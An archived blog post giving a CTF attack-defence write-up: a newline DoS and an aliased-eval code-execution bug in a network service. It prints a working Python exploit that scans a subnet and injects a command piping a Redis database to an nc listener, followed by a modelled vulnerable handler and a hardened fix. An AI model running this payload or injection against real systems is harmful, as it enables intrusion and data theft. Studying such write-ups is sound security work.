Archived View for airmack.de › single › 583237b4a98a84f255a34164e3b60315039e21eb363b1be3104ef238a9… captured on 2021-12-04 at 18:04:22. Gemini links have been rewritten to link to archived content
From the category Hacking
The server application was divided into two parts, a C file (network.c) and a few Python functions encapsulated in server. The first obvious error in the C code was that the parameter parsing was broken: the service could be brought down (DoS) simply by sending a one-byte message containing '\n'. In the first half of the CTF this was used to take down other teams' services, meaning that no other team could score flags or submit flags. This changed later on, after we had a working exploit. The Python function pp used an aliased eval, which could be triggered by sending more than 34 characters. This led to arbitrary code execution and a fully compromised machine, e.g. through a back-connect shell. The function pp was called when walking the 'add' path in the C file. For gathering flags one could simply run 'strings /opt/db.rdb' and pipe the output over an nc connection to a flag-submit service, as the flags are stored in the Redis database. An exploit could look like this:
```python
#!/usr/bin/env python2
import socket
import sys


def read_until(s, token):
    # consume the service banner until `token` shows up (or the peer closes)
    data = ""
    while True:
        tmp = s.recv(4096)
        print tmp
        if not tmp:
            s.close()
            return
        data += tmp
        if token in data:
            return


def backdoorinject(target):
    s = socket.socket()
    s.connect((target, 27))          # the vulnerable service listens on port 27
    read_until(s, "maths!")          # wait for the end of the banner
    # Spaces are written as \x20 so the C-side parameter parsing keeps the whole
    # command in one argument; the eval on the server turns them back into spaces.
    # $IP$ and $PORT$ are placeholders for the flag-submit listener.
    shellcmd = r"strings\x20/opt/db.rdb\x20|\x20nc\x20$IP$\x20$PORT$"
    # the 'a' filler pushes the argument past the 34-character trigger of the
    # aliased eval in pp; the rest is the expression it ends up evaluating
    payload = (
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa__import__('os').system('%s')" % shellcmd
    )
    s.sendall("add user " + payload + "\n")   # 'add' is the path that calls pp
    print s.recv(4096)
    s.close()


targets = range(1, 254)
socket.setdefaulttimeout(1)
for i in targets:
    if i == 41:  # own ip
        continue
    try:
        hostname = "10.60." + str(i) + ".7"  # The remote host
        print hostname, backdoorinject(hostname)
        print " send"
    except:
        print "...failed"
        pass
```
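The writeup does not show network.c or the Python function pp, so the following is an added example and not code from the page or from the CTF service: an assumed Python 3 model of the behaviour described above (a space-separated "add user <arg>" request whose argument reaches an aliased eval once it is longer than 34 characters). It shows why the exploit writes its shell command with \x20 instead of spaces, and puts the bug class next to a hardened handler of the kind you would patch into your own service during the game. The names parse_line, encode_spaces, decode_literal, pp_vulnerable, pp_fixed and the constant ARG_LIMIT are all hypothetical.

```python
"""Added example, not code from the airmack.de writeup or from the CTF service.

network.c and pp are not shown on the page, so this is an assumed model of the
behaviour described there: a space-separated request ("add user <arg>") whose
argument reaches an aliased eval once it is longer than 34 characters.
Python 3; every function name below is hypothetical.
"""
import ast

ARG_LIMIT = 34  # assumed threshold, mirrors "more than 34 characters" above


def parse_line(line):
    """Model of the C-side request parser: (command, name, argument) or None.

    The original parser could be crashed with a one-byte "\\n"; this model
    rejects an empty or malformed line instead of indexing a missing token.
    """
    tokens = [t for t in line.rstrip("\r\n").split(" ") if t]
    if len(tokens) != 3:
        return None
    return tokens[0], tokens[1], tokens[2]


def encode_spaces(cmd):
    """Write every space of a shell command as the escape \\x20.

    The tokenizer above splits on real spaces, so the command must travel as
    one token; the escape only becomes a space again when the server's eval
    parses the string literal the command is embedded in.
    """
    return cmd.replace(" ", "\\x20")


def decode_literal(token):
    """What the server's eval sees: the token inside a single-quoted literal."""
    return ast.literal_eval("'" + token + "'")


def pp_vulnerable(arg):
    """Model of the broken handler: an aliased eval on long arguments."""
    _e = eval  # aliasing hides eval from a grep, not from an attacker
    if len(arg) > ARG_LIMIT:
        return _e(arg)
    return arg


def pp_fixed(arg):
    """Hardened handler: keep the limit, never evaluate attacker input."""
    if len(arg) > ARG_LIMIT:
        raise ValueError("argument too long")
    if not arg.isalnum():
        raise ValueError("argument must be alphanumeric")
    return arg


if __name__ == "__main__":
    # A command with real spaces is split into too many tokens and rejected ...
    print(parse_line("add user strings /opt/db.rdb\n"))
    # ... while the \x20 form survives as one token and decodes to spaces later.
    # $IP$ and $PORT$ are the same placeholders the exploit above uses.
    wire = encode_spaces("strings /opt/db.rdb | nc $IP$ $PORT$")
    _, _, arg = parse_line("add user " + wire + "\n")
    print(decode_literal(arg))
    # Same bug class, exercised with a harmless expression instead of os.system:
    expr = "'" + "x" * 40 + "'.upper()"
    print(pp_vulnerable(expr)[:8])  # the attacker-supplied expression ran
    try:
        pp_fixed(expr)
    except ValueError as e:
        print("blocked:", e)
```

The fix keeps the service's contract (short alphanumeric names are still accepted) and removes the eval entirely; if the checker expected evaluated expressions, `ast.literal_eval` on a length-limited argument would be the next safest step, since it only builds literals and never calls anything.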
Project gemini, created on 13 February 2021
Eat Sleep PWN Repeat, created on 07 December 2020
Breaking out of cisco anyconnect no local network restriction, created on 8 April 2018
Insomni Hack 2015(Lost In Memories) writeup, created on 23 March 2014
ruCTF 2014(Pidometer) writeup, created on 21 December 2014
CMake Matlab/Simulink crosscompiling, created on 02 September 2014